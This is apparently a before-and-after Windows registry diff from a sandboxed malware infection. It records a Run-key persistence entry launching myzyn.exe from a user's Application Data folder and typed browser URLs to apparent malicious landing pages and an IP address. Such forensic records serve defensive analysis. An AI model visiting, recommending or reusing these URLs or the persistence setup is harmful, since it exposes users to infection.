hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage	ProgramsCache	hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f,	hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage	StartMenu_Balloon_Time	hex:b0,27,b0,17,df,98,cd,01,	hex:f0,f5,4b,1c,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACNGU	hex:01,00,00,00,10,00,00,00,50,e8,07,19,df,98,cd,01,	hex:01,00,00,00,14,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\pzq.rkr	hex:01,00,00,00,08,00,00,00,d0,cf,da,d9,de,98,cd,01,	hex:01,00,00,00,09,00,00,00,90,2d,68,fb,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACNGU:P:\Cebtenz Svyrf\Vagrearg Rkcybere\VRKCYBER.RKR	hex:01,00,00,00,08,00,00,00,b0,e4,6a,a6,dd,98,cd,01,	hex:01,00,00,00,09,00,00,00,d0,f4,ef,4e,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACVQY	hex:01,00,00,00,0d,00,00,00,b0,f7,ed,18,df,98,cd,01,	hex:01,00,00,00,11,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5\VafgnyyEvgr.yax	hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,	hex:01,00,00,00,09,00,00,00,60,0a,ac,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5	hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,	hex:01,00,00,00,09,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACNGU:P:\Cebtenz Svyrf\Rcfvyba Fdhnerq\VafgnyyEvgr\VafgnyyEvgr.rkr	hex:01,00,00,00,08,00,00,00,50,e8,07,19,df,98,cd,01,	hex:01,00,00,00,09,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACVQY:::{2559N1S4-21Q7-11Q4-OQNS-00P04S60O9S0}	hex:01,00,00,00,07,00,00,00,b0,e4,6a,a6,dd,98,cd,01,	hex:01,00,00,00,08,00,00,00,70,7b,f1,4e,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACVQY:%pfvqy2%\Jverfunex.yax	hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,	hex:01,00,00,00,06,00,00,00,a0,58,5d,5d,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr		hex:01,00,00,00,06,00,00,00,00,71,80,5d,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore	Type		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore	Flags		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore	Count		dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore	Time		hex:dc,07,09,00,06,00,16,00,10,00,21,00,3a,00,fb,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore	Type		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore	Flags		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore	Count		dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore	Time		hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,94,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore	Time	hex:dc,07,09,00,06,00,16,00,10,00,10,00,2a,00,c6,03,	hex:dc,07,09,00,06,00,16,00,10,00,1c,00,22,00,04,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore	Count	dword:00000002	dword:00000007
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore	Time	hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,ab,01,	hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,50,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore	LoadTime	dword:0000000c	dword:00000009
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	SavedLegacySettings	hex:46,00,00,00,10,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,	hex:46,00,00,00,21,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	Orimdie		""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	{2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401	hex:00,00,00,00,34,00,38,00,50,d3,6d,14,df,98,cd,01,	hex:00,00,00,00,34,00,38,00,e0,c1,39,09,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	{2559A1F5-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401	hex:00,00,00,00,34,00,38,00,20,bf,84,14,df,98,cd,01,	hex:00,00,00,00,34,00,38,00,00,f8,1e,0a,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU	NodeSlots	hex:02,	hex:02,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU	MRUListEx	hex:00,00,00,00,ff,ff,ff,ff,	hex:01,00,00,00,00,00,00,00,ff,ff,ff,ff,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU	1		hex:14,00,1f,48,ba,8f,0d,45,25,ad,d0,11,98,a8,08,00,36,1b,11,03,00,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1	NodeSlot		dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1	MRUListEx		hex:ff,ff,ff,ff,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell	FolderType		"MyDocuments"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	@explorer.exe,-7004		"Opens your Internet browser."
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs	url1	"http://www.google.com/"	"http://46.249.59.116/main.php?page=5a56c997ffff2f79"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs	url2	"http://google.com/"	"http://www.google.com/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs	url3	"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"	"http://ns8.ns360.info/main.php?page=f61d19dee2176c62"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs	url4	"http://urlquery.net/"	"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs	url5	"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"	"http://urlquery.net/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs	url6	"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"	"http://google.com/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs	url7	"http://oldversion.com/"	"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs	url8	"http://go.microsoft.com/fwlink/?LinkId=69157"	"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs	url9		"http://oldversion.com/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs	url10		"http://go.microsoft.com/fwlink/?LinkId=69157"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\DropDown
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Health
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{0890F930-4F80-4646-BAB1-4B6E5571FB89}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{1F32514F-1561-4922-A604-8A1F478B5A42}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{52903d79-f993-4de6-8317-20c9c176d823}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{59E7BF52-E5C9-4382-A39A-522DEE9AFDFD}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}	AttemptedAutoRun		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5F4BB5C9-4652-489B-8601-EEC0C3C32E2E}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{7F2B1D6B-1357-402C-A1C8-67E59583B41D}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{93075F62-16B3-43EC-A53B-FFAD0E01D5E7}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACVQY	hex:01,00,00,00,0d,00,00,00,b0,f7,ed,18,df,98,cd,01,	hex:01,00,00,00,11,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5\VafgnyyEvgr.yax	hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,	hex:01,00,00,00,09,00,00,00,60,0a,ac,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5	hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,	hex:01,00,00,00,09,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACNGU:P:\Cebtenz Svyrf\Rcfvyba Fdhnerq\VafgnyyEvgr\VafgnyyEvgr.rkr	hex:01,00,00,00,08,00,00,00,50,e8,07,19,df,98,cd,01,	hex:01,00,00,00,09,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACVQY:::{2559N1S4-21Q7-11Q4-OQNS-00P04S60O9S0}	hex:01,00,00,00,07,00,00,00,b0,e4,6a,a6,dd,98,cd,01,	hex:01,00,00,00,08,00,00,00,70,7b,f1,4e,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACVQY:%pfvqy2%\Jverfunex.yax	hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,	hex:01,00,00,00,06,00,00,00,a0,58,5d,5d,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr		hex:01,00,00,00,06,00,00,00,00,71,80,5d,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore	Type		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore	Flags		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore	Count		dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore	Time		hex:dc,07,09,00,06,00,16,00,10,00,21,00,3a,00,fb,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore	Type		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore	Flags		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore	Count		dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore	Time		hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,94,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore	Type		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore	Flags		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore	LoadTime	dword:0000000c	dword:00000009
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	SavedLegacySettings	hex:46,00,00,00,10,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,	hex:46,00,00,00,21,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Run	Orimdie		""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	{2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401	hex:00,00,00,00,34,00,38,00,50,d3,6d,14,df,98,cd,01,	hex:00,00,00,00,34,00,38,00,e0,c1,39,09,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	{2559A1F5-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401	hex:00,00,00,00,34,00,38,00,20,bf,84,14,df,98,cd,01,	hex:00,00,00,00,34,00,38,00,00,f8,1e,0a,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU	NodeSlots	hex:02,	hex:02,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU	MRUListEx	hex:00,00,00,00,ff,ff,ff,ff,	hex:01,00,00,00,00,00,00,00,ff,ff,ff,ff,
